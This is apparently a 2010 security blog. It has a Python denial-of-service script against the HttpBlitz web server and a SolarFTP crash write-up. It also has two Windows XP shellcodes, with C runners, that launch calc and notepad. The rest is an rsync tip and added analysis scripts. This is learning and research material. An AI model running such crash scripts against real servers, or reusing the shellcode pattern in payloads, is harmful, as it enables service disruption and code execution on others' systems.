2010
12.27

Wooowww.... Crazy... If a site of BackTrack's calibre can be "owned"... what about all the other sites...?? (I want to know what the attack vector was.. :D )

For more information, click this link.

2010
12.24
#!/usr/bin/python

# Title: HttpBlitz DOS
# Date: 12/24/2010
# Author: otoy
# Software Link: http://sourceforge.net/projects/httpblitz/files/HttpBlitz.msi/download
# Tested on: Windows XP SP3
#
# ======================================================================
#        ___       _ __        __            __    _     __
#   ____/ (_)___ _(_) /_____ _/ / ___  _____/ /_  (_)___/ /___  ____ _
#  / __  / / __ `/ / __/ __ `/ / / _ \/ ___/ __ \/ / __  / __ \/ __ `/
# / /_/ / / /_/ / / /_/ /_/ / / /  __/ /__/ / / / / /_/ / / / / /_/ /
# \__,_/_/\__, /_/\__/\__,_/_/  \___/\___/_/ /_/_/\__,_/_/ /_/\__,_/
#        /____/                      http://www.digital-echidna.org
# ======================================================================
#
# Greetz:
#   say hello to all digital-echidna org crew:
#       modpr0be, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix
#   special thx to offsec, exploit-db, corelan team
#
#### Software description:
# A cross platform Http web server developed using C++. Agile methodology
# with emphasis on :- 1. Good Design 2. Object Oriented Programming 3.
# Refactoring 4. Static/Dynamic Analysis, Unit-testing, Code Coverage 5.
# Software Engineering best practices.
#
#### DOS information:
# you just have to send long string, and it will crash the program.
# just scan the port using nmap will crash the program too.

import socket, sys
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

junk = "\x41" * 80000

def banner():
    print "\nHttpBlitz DOS."
    print "By: otoy (otoy[at]digital-echidna[dot]org)\n"

if len(sys.argv)!=3:
    banner()
    print "Usage: %s <ip> <port>\n" %sys.argv[0]
    sys.exit(0)

try:
    s.connect((sys.argv[1], int(sys.argv[2])))
except:
    print "Can\'t connect to server!\n"
    sys.exit(0)

s.send(junk+'\r\n')
s.close()

In action:

2010
12.22

Today, the BackTrack team would like to congratulate Chris “loganWHD” for the release of his book, “Social Engineering: The Art of Human Hacking”.

This book has been widely anticipated and will help many new to the field of social engineering answer that age old question: “Where do I start?”

Experienced social engineers will gain benefit as well, as the book dives deep into some of the most complex and important aspects of social engineering. Topics range from information gathering to micro-expressions to non-verbal behavior and much more.

As systems become more and more protected, targeting the users has become the lowest effort way into many companies. Professional penetration testers will gain much value from this book, as it covers many of the most effective attack vectors available today.

-Backtrack Blog-

2010
12.17

SolarFTP Server 2.0 is prone to a denial of service condition: it fails to properly sanitize user-supplied input. With a specially crafted 'USER', 'APPE', 'GET', 'PUT' or 'NLST' command, a remote attacker can potentially disable the FTP service.

Software Description

Solar FTP Server is a handy and easy to use personal FTP server with features like virtual directories, simple and intuitive user interface, real-time activity monitoring and management.

Testing and Fuzzing

Using Very Simple FTP Fuzzer, we tested the FTP server with various commands. The first command we sent was APPE (append). The Windows exception handler popped up, which verified that the server may be vulnerable to some commands.

Unfortunately, the junk we sent did not overwrite the SEH or EIP; it just ended in a denial of service. In conclusion, there are four commands that make the server crash: APPE, NLST, PUT and GET.


2010
12.09

On December 7th, 2010, Dan Rosenberg published his 0day exploit for Linux kernel <= 2.6.37 that causes a local privilege escalation. Take a look at the published exploit here (via exploit-db).

Here’s the exploit against Ubuntu Server 10.10.

0day Linux Kernel <=2.6.37 Local Privilege Escalation Exploit

2010
12.08

I'm writing this here so I won't forget it. These are the rsync options to sync two directories. It will skip existing files and directories, preserve modification times, and sync recursively.

rsync -r -n -t -v --progress --ignore-existing -s [SOURCE DIR] [DESTINATION DIR]

This is a DRY RUN, which will not execute the sync.
Do this first to make sure that your source directory and destination directory are valid to be synced.

If you’re sure to execute it, just remove the -n option.
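As an added check (not part of the original post), this Python script builds two constructed directory trees and drives the post's rsync command, first with -n and then without, to confirm what the options do: the dry run changes nothing, --ignore-existing leaves a file already at the destination untouched even though the source differs, and -t carries the source mtime over. It assumes rsync is on PATH and adds a trailing slash to the source path so the directory's contents, rather than the directory itself, are synced.

```python
import os
import shutil
import subprocess
import tempfile


def demo_rsync_ignore_existing():
    """Run the post's rsync options (dry run, then for real) over constructed
    trees and report what each pass did. Returns None if rsync is not on PATH
    (assumption: rsync is installed)."""
    if shutil.which("rsync") is None:
        return None
    base = tempfile.mkdtemp()
    src, dst = os.path.join(base, "src"), os.path.join(base, "dst")
    os.makedirs(os.path.join(src, "sub"))
    os.makedirs(dst)
    # Constructed fixtures: shared.txt exists on both sides with different content,
    # sub/new.txt exists only in the source and carries an old, recognisable mtime.
    with open(os.path.join(src, "shared.txt"), "w") as f:
        f.write("source version")
    with open(os.path.join(dst, "shared.txt"), "w") as f:
        f.write("destination version")
    new_src = os.path.join(src, "sub", "new.txt")
    with open(new_src, "w") as f:
        f.write("only in source")
    old_mtime = 946684800  # 2000-01-01 UTC
    os.utime(new_src, (old_mtime, old_mtime))

    opts = ["rsync", "-r", "-t", "-v", "--progress", "--ignore-existing", "-s"]
    # Dry run first (-n): rsync lists what it would do but must copy nothing.
    subprocess.run(opts + ["-n", src + "/", dst + "/"], check=True, capture_output=True)
    new_dst = os.path.join(dst, "sub", "new.txt")
    dry_run_copied = os.path.exists(new_dst)
    # Real run: same options without -n.
    subprocess.run(opts + [src + "/", dst + "/"], check=True, capture_output=True)
    with open(os.path.join(dst, "shared.txt")) as f:
        shared_after = f.read()
    result = {
        "dry_run_copied": dry_run_copied,                       # expect False
        "new_file_copied": os.path.exists(new_dst),             # expect True
        "existing_untouched": shared_after == "destination version",  # --ignore-existing
        "mtime_preserved": int(os.stat(new_dst).st_mtime) == old_mtime,  # -t
    }
    shutil.rmtree(base)
    return result
```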

2010
12.07
/*

==========================================================================
       ___       _ __        __                __    _     __
  ____/ (_)___ _(_) /_____ _/ /     ___  _____/ /_  (_)___/ /___  ____ _
 / __  / / __ `/ / __/ __ `/ /_____/ _ \/ ___/ __ \/ / __  / __ \/ __ `/
/ /_/ / / /_/ / / /_/ /_/ / /_____/  __/ /__/ / / / / /_/ / / / / /_/ /
\__,_/_/\__, /_/\__/\__,_/_/      \___/\___/_/ /_/_/\__,_/_/ /_/\__,_/
       /____/                          http://www.digital-echidna.org

==========================================================================

Title     : Windows XP SP3 (EN) 32-bit - calc Shellcode 27 bytes
Author    : otoy
Tested on : WinXP Pro SP3 (EN) 32 bit
Greetz    :
say hello to all digital-echidna org crew:
   modpr0be, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix

special thx to offsec, exploit-db and corelan team */

/*shellcodetest.c*/ 

char code[] =
"\x31\xc0\x50\x68\x63"
"\x61\x6c\x63\x89\xe3"
"\x50\x53\xbb"
"\xfd\x29\x86\x7c" /*Kernel32.dll.WinExec*/
"\xff\xd3\x50\xbb"
"\xfa\xca\x81\x7c" /*Kernel32.dll.ExitProcess*/
"\xff\xd3";

int main(int argc, char **argv)
{
	int (*func)();
	func = (int (*)()) code;
	(int)(*func)();
}
2010
12.06

Finally, my first win32 shellcode..

This will execute notepad.exe when loaded. Run on Windows XP SP3 English.

/*
==========================================================================
       ___       _ __        __                __    _     __
  ____/ (_)___ _(_) /_____ _/ /     ___  _____/ /_  (_)___/ /___  ____ _
 / __  / / __ `/ / __/ __ `/ /_____/ _ \/ ___/ __ \/ / __  / __ \/ __ `/
/ /_/ / / /_/ / / /_/ /_/ / /_____/  __/ /__/ / / / / /_/ / / / / /_/ /
\__,_/_/\__, /_/\__/\__,_/_/      \___/\___/_/ /_/_/\__,_/_/ /_/\__,_/
       /____/                          http://www.digital-echidna.org
==========================================================================
Title: Windows XP SP3 (EN) 32-bit - notepad.exe shellcode 53 bytes
Author: modpr0be
Tested on: WinXP Pro SP3 (EN) 32 bit - Build 2600.xpsp_sp3_gdr.100427-1636
Greetz:
say hello to all digital-echidna org crew:
otoy, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix

special thx to amalia (^^), offsec, exploit-db, and corelan team
*/

/*shellcodetest.c*/

char code[] = "\x31\xc0\x50\xb8\x72\x75\x11\x11"
"\x2d\x11\x11\x11\x11\x50\x68\x6f"
"\x74\x65\x70\x68\x2f\x63\x20\x6e"
"\x68\x65\x78\x65\x20\x68\x63\x6d"
"\x64\x2e\x89\xe3\x50\x53\xbb"
"\x0d\x25\x86\x7c"			/*Kernel32.dll.WinExec*/
"\xff\xd3\x50\xbb"
"\x12\xcb\x81\x7c"			/*Kernel32.dll.ExitProcess*/
"\xff\xd3";

int main(int argc, char **argv)
{
	int (*func)();
	func = (int (*)()) code;
	(int)(*func)();
}
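As an added analysis example (not from either post), the following Python walks the two shellcodes above statically, emulating only the handful of instructions they use, to recover the command string each builds on the stack and the absolute addresses each calls. It shows what an analyst can pull out of such a payload without running it, and why both are tied to one XP SP3 build: the call targets are hardcoded kernel32.dll addresses (kernel32 is mapped at 0x7C800000 on XP SP3 and XP has no ASLR), so the same bytes would fault on any other build.

```python
import struct

# Shellcode bytes copied from the two posts above: calc (27 bytes) and notepad (53 bytes).
CALC_SC = (b"\x31\xc0\x50\x68\x63\x61\x6c\x63\x89\xe3\x50\x53\xbb\xfd\x29\x86\x7c"
           b"\xff\xd3\x50\xbb\xfa\xca\x81\x7c\xff\xd3")
NOTEPAD_SC = (b"\x31\xc0\x50\xb8\x72\x75\x11\x11\x2d\x11\x11\x11\x11\x50\x68\x6f"
              b"\x74\x65\x70\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63\x6d"
              b"\x64\x2e\x89\xe3\x50\x53\xbb\x0d\x25\x86\x7c\xff\xd3\x50\xbb"
              b"\x12\xcb\x81\x7c\xff\xd3")

def analyze(sc):
    """Statically walk the small x86 opcode subset these payloads use, tracking
    EAX and the dwords pushed, to recover the command string built on the
    stack and the absolute call targets, without ever executing the bytes."""
    eax, ebx, stack, calls, command, i = None, None, [], [], None, 0
    while i < len(sc):
        op, word = sc[i], sc[i:i + 2]
        if word == b"\x31\xc0":                # xor eax, eax  (NUL terminator / zero arg)
            eax, i = 0, i + 2
        elif word == b"\x89\xe3":              # mov ebx, esp  (ebx -> string just pushed)
            ebx, i = "esp", i + 2
            raw = b"".join(struct.pack("<I", v) for v in reversed(stack))
            command = raw.split(b"\x00", 1)[0].decode("ascii")
        elif word == b"\xff\xd3":              # call ebx      (absolute, hardcoded target)
            calls.append(ebx)
            i += 2
        elif op == 0x50:                       # push eax
            stack.append(eax)
            i += 1
        elif op == 0x53:                       # push ebx
            stack.append(ebx)
            i += 1
        elif op in (0x68, 0xb8, 0xbb, 0x2d):   # imm32 forms: push / mov eax / mov ebx / sub eax
            imm = struct.unpack_from("<I", sc, i + 1)[0]
            if op == 0x68:
                stack.append(imm)
            elif op == 0xb8:
                eax = imm
            elif op == 0xbb:
                ebx = imm
            else:                              # sub eax, imm32: yields "ad\0\0" with no NUL bytes in the code
                eax = (eax - imm) & 0xffffffff
            i += 5
        else:
            raise ValueError("unhandled opcode 0x%02x at offset %d" % (op, i))
    # kernel32.dll is mapped at 0x7C800000 on Windows XP SP3; targets inside it pin the payload to that build.
    return {"length": len(sc), "command": command, "calls": calls,
            "xp_sp3_only": all(0x7c800000 <= a < 0x7c900000 for a in calls)}
```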